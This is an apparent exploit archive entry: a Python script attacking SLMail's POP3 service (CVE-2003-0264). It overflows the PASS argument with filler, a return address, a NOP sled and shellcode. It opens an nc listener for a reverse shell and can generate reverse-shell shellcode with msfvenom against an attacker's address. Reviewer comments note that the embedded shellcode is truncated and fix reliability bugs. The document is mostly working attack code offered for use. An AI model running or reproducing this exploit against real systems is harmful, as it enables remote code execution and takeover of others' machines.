Authored by mednic | Site github.com

SLMail version 5.1.0.4420 remote code execution exploit: an oversized POP3 `PASS` argument sent to TCP/110 overflows a buffer and overwrites the saved return address, which the payload below points at a NOP sled followed by shellcode.

advisories | CVE-2003-0264

# -*- coding: utf-8 -*-
import socket
import subprocess
import sys
from os import system
from time import sleep

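system("clear")
print('Shell-code-foi-informada?\r\n')
print('[1] sim')
print('[2] naon')
# raw_input returns the typed text unchanged.  The original used input(),
# which on Python 2 eval()s the answer, so any expression typed at the
# prompt was executed as code.  A non-numeric answer is mapped to 0 so the
# menu further down reports it as invalid instead of dying with ValueError.
try:
    quest = int(raw_input('>>> '))
except ValueError:
    quest = 0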

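def main():
    """Run the SLMail POP3 ``PASS`` overflow against a host typed by the user.

    Steps: clear the screen, print the banner, ask for the target host, start
    a local ``nc -nlvp 444`` listener in the background, connect to TCP/110,
    send ``USER guest`` and then a ``PASS`` line carrying the overflow
    payload, send ``QUIT``, close the socket and finally wait for the listener
    so a reverse shell that arrives stays usable.

    The previous version ran the listener with ``os.system`` *before* sending
    the payload; ``system`` blocks until ``nc`` exits, so the overflow was
    never sent while the listener was up.  ``subprocess.Popen`` keeps the
    listener in the background instead.

    Returns nothing.  Exits the interpreter if the connection fails.
    """
    system("clear")
    # ============================
    # -- paste your shellcode here (output of `msfvenom ... -f python`).
    # NOTE(review): only 130 bytes are present below, and a shikata_ga_nai
    # decoder whose counter is 0x52 expects a much longer encoded body, so
    # this payload is truncated; replace it with a complete msfvenom output
    # before use.  Bytes literals keep this correct on Python 2 and 3.
    buf = b""
    buf += b"\xb8\xaa\x62\xd3\xea\xda\xd4\xd9\x74\x24\xf4\x5e\x29"
    buf += b"\xc9\xb1\x52\x31\x46\x12\x03\x46\x12\x83\x44\x9e\x31"
    buf += b"\x1f\x64\xb7\x34\xe0\x94\x48\x59\x68\x71\x79\x59\x0e"
    buf += b"\xf2\x2a\x69\x44\x56\xc7\x02\x08\x42\x5c\x66\x85\x65"
    buf += b"\xd5\xcd\xf3\x48\xe6\x7e\xc7\xcb\x64\x7d\x14\x2b\x54"
    buf += b"\x4e\x69\x2a\x91\xb3\x80\x7e\x4a\xbf\x37\x6e\xff\xf5"
    buf += b"\x8b\x05\xb3\x18\x8c\xfa\x04\x1a\xbd\xad\x1f\x45\x1d"
    buf += b"\x4c\xf3\xfd\x14\x56\x10\x3b\xee\xed\xe2\xb7\xf1\x27"
    buf += b"\x3b\x37\x5d\x06\xf3\xca\x9f\x4f\x34\x35\xea\xb9\x46"
    buf += b"\xc8\xed\x7e\x34\x16\x7b\x64\x9e\xdd\xdb\x40\x1e\x31"
    # ===========================

    print('Exploit - CVE-2003-0264\nplatfor: windows\nPOP3 SLmail-5.5 overflow :)')
    print('\nby: - Mednic -\r\n')
    host = raw_input('Host: ')

    # 2606 bytes of filler reach the saved return address; the next four
    # bytes overwrite it with 0x5f4a358f (little-endian), presumably a
    # JMP ESP-style gadget in the target process -- verify for your build.
    # A NOP sled then leads into the shellcode.
    ret_addr = b"\x8f\x35\x4a\x5f"
    payload = b"A" * 2606 + ret_addr + b"\x90" * 39 + buf

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    sleep(3)
    print('\nIniciando conexão ao servidor...\n')
    sleep(2)
    try:
        s.connect((host, 110))
        s.recv(1024)
    except socket.error:
        # Narrow except: the original bare `except:` also swallowed
        # KeyboardInterrupt and SystemExit.
        s.close()
        print('Conexão recusada !')
        sys.exit()
    s.settimeout(1)

    print('\nEnviando usuario...\n')
    s.send(b"USER guest\r\n")
    s.recv(1024)

    print('\nIniciando estouro de buffer...\n')
    # Background listener for the reverse shell.  The port must match the
    # LPORT the shellcode was generated with (444 in the menu option below).
    listener = subprocess.Popen(['nc', '-nlvp', '444'])
    try:
        s.send(b"PASS " + payload + b"\r\n")
        # After the overflow the service may stop answering, so a timeout
        # or reset on the follow-up reads is expected rather than an error.
        try:
            s.recv(1024)
            s.send(b"QUIT\r\n")
        except (socket.error, socket.timeout):
            pass
    finally:
        s.close()
    # Hand the terminal to the listener until the shell session ends.
    listener.wait()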

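if quest == 1:
    main()

elif quest == 2:
    print("IP para conexão reversa !")
    ip = raw_input('>>> ')
    system('clear')
    # argv list instead of a shell string: the address is typed by the user
    # and was previously spliced into an os.system() command unescaped, so
    # anything after a `;` or `$(` would have run as a shell command.
    # The bad-character list is passed as the literal text \x00\x0a\x0d\x20,
    # which is what msfvenom parses; real NUL/CR/LF bytes cannot travel
    # through argv.
    subprocess.call([
        'msfvenom', '-p', 'windows/shell_reverse_tcp',
        'LHOST=' + ip, 'LPORT=444',
        '-b', '\\x00\\x0a\\x0d\\x20',
        '-f', 'python',
    ])
    print('\r\nCopie e substitua pelo setado no codigo !')

else:
    print('Invalido argumento')
    sys.exit()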